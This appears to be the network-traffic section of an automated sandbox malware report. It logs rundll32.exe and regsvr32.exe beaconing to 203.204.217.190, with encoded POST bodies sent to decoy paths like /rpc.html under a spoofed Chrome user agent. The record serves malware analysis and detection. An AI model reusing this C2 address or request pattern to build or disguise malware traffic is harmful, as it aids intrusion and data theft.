Sep 27, 2024 11:19:26.477173090 CEST | 49730 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:26.480313063 CEST | 8082 | 49731 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:26.480411053 CEST | 49731 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:26.481462002 CEST | 49731 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:26.481952906 CEST | 8082 | 49730 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:26.486004114 CEST | 49732 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:26.486453056 CEST | 8082 | 49731 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:26.491056919 CEST | 8082 | 49732 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:26.491174936 CEST | 49732 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:26.492108107 CEST | 49732 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:26.496968031 CEST | 8082 | 49732 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:28.646927118 CEST | 8082 | 49730 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:28.646998882 CEST | 49730 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:28.647254944 CEST | 49730 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:28.652067900 CEST | 8082 | 49730 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:28.663781881 CEST | 8082 | 49732 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:28.663856030 CEST | 49732 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:28.666421890 CEST | 49732 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:28.671327114 CEST | 8082 | 49732 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:28.673721075 CEST | 8082 | 49731 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:28.673789024 CEST | 49731 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:28.674011946 CEST | 49731 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:28.678819895 CEST | 8082 | 49731 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:29.294512033 CEST | 49733 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:29.299578905 CEST | 8082 | 49733 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:29.299688101 CEST | 49733 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:29.301240921 CEST | 49733 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:29.306114912 CEST | 8082 | 49733 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:31.540150881 CEST | 8082 | 49733 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:31.540241003 CEST | 49733 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:31.540505886 CEST | 49733 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:31.545320988 CEST | 8082 | 49733 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:31.995764017 CEST | 49734 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:32.001554966 CEST | 8082 | 49734 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:32.001631975 CEST | 49734 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:32.002424002 CEST | 49734 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:32.007786989 CEST | 8082 | 49734 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:34.189575911 CEST | 8082 | 49734 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:34.189671993 CEST | 49734 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:34.189866066 CEST | 49734 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:34.194781065 CEST | 8082 | 49734 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:34.981076956 CEST | 49735 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:34.986495972 CEST | 8082 | 49735 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:34.986571074 CEST | 49735 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:34.987976074 CEST | 49735 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:34.992842913 CEST | 8082 | 49735 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:37.290112019 CEST | 8082 | 49735 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:19:37.290186882 CEST | 49735 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:37.290354967 CEST | 49735 | 8082 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:19:37.295759916 CEST | 8082 | 49735 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:20:28.673969030 CEST | 49743 | 8092 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:20:28.678922892 CEST | 8092 | 49743 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:20:28.679018974 CEST | 49743 | 8092 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:20:28.680557966 CEST | 49743 | 8092 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:20:28.685414076 CEST | 8092 | 49743 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:20:28.716195107 CEST | 49744 | 8092 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:20:28.718393087 CEST | 49745 | 8092 | 192.168.2.4 | 203.204.217.190
Sep 27, 2024 11:20:28.721194029 CEST | 8092 | 49744 | 203.204.217.190 | 192.168.2.4
Sep 27, 2024 11:20:28.721293926 CEST | 49744 | 8092 | 192.168.2.4 | 203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:28.722107887 CEST497448092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:28.723237991 CEST809249745203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:28.723311901 CEST497458092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:28.724116087 CEST497458092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:28.727066994 CEST809249744203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:28.728929996 CEST809249745203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.626269102 CEST809249743203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.626600981 CEST497438092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.631946087 CEST809249743203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.632028103 CEST497438092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.646058083 CEST497468092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.650939941 CEST809249746203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.651006937 CEST497468092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.652786970 CEST497468092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.657614946 CEST809249746203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.657740116 CEST809249746203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.673208952 CEST809249745203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.673355103 CEST497458092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.678991079 CEST809249745203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.679049015 CEST497458092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.683161974 CEST809249744203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.683372021 CEST497448092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.688555002 CEST809249744203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.688611031 CEST497448092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.691692114 CEST497478092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.697050095 CEST809249747203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.697115898 CEST497478092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.697854996 CEST497478092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.702379942 CEST497488092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.702811003 CEST809249747203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.707281113 CEST809249748203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.707340002 CEST497488092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.707678080 CEST497488092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.712551117 CEST809249748203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.712604046 CEST809249748203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.596457958 CEST809249746203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.598642111 CEST497468092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.603923082 CEST809249746203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.604021072 CEST497468092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.674983025 CEST809249747203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.686956882 CEST809249748203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.688055038 CEST497478092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.688142061 CEST497488092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.693289995 CEST809249747203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.693377972 CEST497478092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.693646908 CEST809249748203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:30.693703890 CEST497488092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:31.568361044 CEST497498092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:31.573540926 CEST809249749203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:31.573786974 CEST497498092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:31.575443029 CEST497498092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:31.581386089 CEST809249749203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:32.544504881 CEST809249749203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:32.544747114 CEST497498092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:32.549866915 CEST809249749203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:32.549957991 CEST497498092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:32.568182945 CEST497508092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:32.572948933 CEST809249750203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:32.573024988 CEST497508092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:32.574444056 CEST497508092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:32.579205036 CEST809249750203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:33.552536011 CEST809249750203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:33.570204973 CEST497508092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:33.575454950 CEST809249750203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:33.575696945 CEST497508092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:34.218601942 CEST497518092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:34.223516941 CEST809249751203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:34.223644972 CEST497518092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:34.225265026 CEST497518092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:34.231870890 CEST809249751203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:35.231462955 CEST809249751203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:35.231723070 CEST497518092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:35.236882925 CEST809249751203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:35.236928940 CEST497518092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:35.244057894 CEST497528092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:35.248939991 CEST809249752203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:35.249037981 CEST497528092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:35.249691010 CEST497528092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:35.254455090 CEST809249752203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:36.235466957 CEST809249752203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:36.250197887 CEST497528092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:36.256428003 CEST809249752203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:36.256484985 CEST497528092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:37.329711914 CEST497538092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:37.334673882 CEST809249753203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:37.334783077 CEST497538092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:37.335661888 CEST497538092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:37.340457916 CEST809249753203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:38.321647882 CEST809249753203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:38.321886063 CEST497538092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:38.326973915 CEST809249753203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:38.327033043 CEST497538092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:38.336997032 CEST497548092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:38.341909885 CEST809249754203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:20:38.342005014 CEST497548092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:38.342720032 CEST497548092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:20:38.347624063 CEST809249754203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:38.064007044 CEST497688092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:38.069334984 CEST809249768203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:38.069401979 CEST497688092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:38.438329935 CEST497698092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:39.392088890 CEST809249769203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:39.392241001 CEST497698092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:39.393290997 CEST497698092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:39.398008108 CEST809249769203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:40.350692034 CEST809249769203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:40.350858927 CEST497698092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:40.357012987 CEST809249769203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:40.357070923 CEST497698092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:40.361723900 CEST497708092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:40.366547108 CEST809249770203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:40.366632938 CEST497708092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:40.367018938 CEST497708092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:40.371761084 CEST809249770203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:41.364435911 CEST809249770203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:41.381913900 CEST497708092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:41.388238907 CEST809249770203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:41.388880968 CEST497708092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:41.619261980 CEST497718092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:41.624172926 CEST809249771203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:41.624320030 CEST497718092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:41.626071930 CEST497718092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:41.630985975 CEST809249771203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:42.592505932 CEST809249771203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:42.592873096 CEST497718092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:42.605313063 CEST809249771203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:42.605375051 CEST497718092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:42.612941980 CEST497728092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:42.624924898 CEST809249772203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:42.625015020 CEST497728092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:42.625525951 CEST497728092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:42.637048960 CEST809249772203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:43.579540014 CEST809249772203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:43.596271992 CEST497728092192.168.2.4203.204.217.190
                                                                                                                                                                                                                    Sep 27, 2024 11:22:43.602870941 CEST809249772203.204.217.190192.168.2.4
                                                                                                                                                                                                                    Sep 27, 2024 11:22:43.602967024 CEST497728092192.168.2.4203.204.217.190
• 203.204.217.190:8092
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49743 | 203.204.217.190 | 8092 | 7488 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 11:20:29.626269102 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49746 | 203.204.217.190 | 8092 | 7488 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 11:20:29.652786970 CEST | 1493 | OUT | POST /rpc.html?o=7v7059308&sc=67086726 HTTP/1.1
Host: 203.204.217.190:8092
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
Content-Length: 1209
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
Data Raw: 1f 8b 08 00 00 00 00 00 04 ff 64 96 51 b2 e2 bc 0e 84 b7 a2 ad 28 76 27 d1 c1 b6 3c 92 0c 13 f6 bf 90 5b 26 43 e0 dc ff 85 82 22 71 5a ea af a5 b8 d4 22 8d a4 fd 20 85 68 73 f2 9b 54 5d a4 20 53 d2 5d 4b 86 39 99 0e 38 2d 23 02 b6 72 50 1f 96 76 76 d0 52 54 b3 c0 83 aa 78 d6 b1 84 b4 8d 0a 07 1a 32 79 80 f3 ca 1e 0d ee 70 6a 90 6d 47 26 1e a1 a6 23 40 95 47 45 98 c0 e9 87 ad 38 ad aa e1 a1 e9 46 dd 8f b4 4b db 68 e7 27 37 a7 8a 12 0f 0e 98 93 71 7e b0 07 9c 62 17 1d c6 49 8a d3 83 03 b6 16 d5 8c 4c 2e 36 ba d3 9f 21 2d 46 2f 08 8a 5d d2 6d 07 67 64 f2 3f 83 a3 1c b4 a3 8a f7 1d 06 27 ef b2 ae b4 a1 05 57 49 d2 e8 87 db 36 db d0 b4 6d 85 0d 4e 86 9d 17 1a b5 8b cd 32 0d 3f e3 8e c6 a1 46 49 47 0b 58 a0 65 b4 74 50 d2 87 da 0d 46 1b 2f 2b 3c 9c 92 71 d7 c2 4e 15 dc a4 6d 4e a3 bb 3c a5 6d 94 25 e7 02 73 f2 51 0a 5a 99 b7 b7 15 56 d1 c2 89 5b 48 d5 76 50 06 f2 41 e9 c9 f6 69 ce 29 c9 75 b4 3c 25 79 b0 ad e2 fb bf 6b 5d fb 2e 1e 92 38 90 cb 41 1d 2d 38 15 bc e5 de 45 0b 5a 9a bf ff c9 dd 47 db f4 0e 23 [TRUNCATED]
Data Ascii: dQ(v'<[&C"qZ" hsT] S]K98-#rPvvRTx2ypjmG&#@GE8FKh'7q~bIL.6!-F/]mgd?'WI6mN2?FIGXetPF/+<qNmN<m%sQZV[HvPAi)u<%yk].8A-8EZG#UezcKnHju6s)m-?pJG$6<aJ'}R@rpR`>ZY350>?}KvX'$c"3dz]&U3(e;ZT04k5X$(qq`=Un]8kOc)tW*/O~viYiE$2amz4._J@&KI~B+?d6~wR}O]9[4uUW2yY{_e{eyTE4z<?3R`v.~qLG2~z5z>>('@^]W,Xt.tC,FE `R9[]tDM74Is$:xCgi'Y)iZQ{&Eo5 YOme1"tGwv5j%aJSv1nA7,DiF)P?Y]vRKn/J,wR\3Z4uq [TRUNCATED]
Sep 27, 2024 11:20:30.596457958 CEST | 82 | IN | HTTP/1.1 404 Not Found
Date: Fri, 27 Sep 2024 09:20:30 GMT
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49745 | 203.204.217.190 | 8092 | 7480 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 11:20:29.673208952 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49744 | 203.204.217.190 | 8092 | 7472 | C:\Windows\SysWOW64\regsvr32.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 11:20:29.683161974 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49747 | 203.204.217.190 | 8092 | 7480 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 11:20:29.697854996 CEST | 866 | OUT | POST /oauth/oauth2/oauth2/api/oauth/php/oauth2callback/rpc.html?j=667332t1t6&yi=670f86726 HTTP/1.1
Host: 203.204.217.190:8092
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
Content-Length: 532
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
Data Raw: 63 63 66 36 65 33 61 33 38 65 62 31 35 62 61 35 34 35 66 64 37 30 66 34 63 38 66 63 37 63 62 63 36 35 63 35 30 38 61 65 34 37 38 30 65 36 31 62 30 65 33 33 33 64 37 38 64 66 66 35 61 39 36 32 36 34 37 38 36 31 37 34 37 36 36 36 36 63 34 66 36 38 35 61 37 39 36 36 35 34 34 63 35 38 36 34 36 63 36 66 33 39 33 33 35 32 37 61 35 37 36 33 34 63 36 61 34 36 33 31 37 61 36 38 33 35 33 36 34 62 32 66 33 30 36 61 33 34 35 34 36 64 36 32 37 32 36 63 36 37 30 61 34 31 36 65 36 61 36 62 37 35 34 39 36 64 35 61 32 62 34 35 35 39 34 38 34 63 36 32 36 33 35 37 34 37 36 61 35 38 34 33 37 39 33 35 33 39 35 35 37 30 37 34 33 36 35 31 32 62 36 62 35 38 37 32 35 32 37 39 34 65 36 62 36 32 37 61 36 31 33 35 32 62 34 64 35 35 30 61 32 64 32 64 32 64 32 30 35 38 34 38 36 64 33 33 35 30 37 38 37 31 34 39 35 38 33 35 32 66 36 63 37 37 37 61 36 62 37 35 34 35 36 66 36 61 36 37 33 39 34 66 35 38 37 61 36 31 34 32 33 35 37 31 34 37 33 33 36 39 35 39 35 31 36 63 35 34 33 34 34 39 35 34 33 38 37 34 33 33 37 35 33 34 30 61 33 64 [TRUNCATED]
Data Ascii:
Sep 27, 2024 11:20:30.674983025 CEST | 82 | IN | HTTP/1.1 404 Not Found
Date: Fri, 27 Sep 2024 09:20:30 GMT
Content-Length: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    5192.168.2.449748203.204.217.19080927472C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Sep 27, 2024 11:20:29.707678080 CEST1527OUTPOST /namespaces/db/oauth2callback/oauth2callback/db/api.html?c=68572884&oo=6708672y6 HTTP/1.1
                                                                                                                                                                                                                    Host: 203.204.217.190:8092
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36
                                                                                                                                                                                                                    Content-Length: 1196
                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                    Accept-Encoding: gzip
Sep 27, 2024 11:20:30.686956882 CEST | 82 | IN | HTTP/1.1 404 Not Found
Date: Fri, 27 Sep 2024 09:20:30 GMT
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49749 | 203.204.217.190 | 8092 | 7624 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 11:20:32.544504881 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49750 | 203.204.217.190 | 8092 | 7624 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
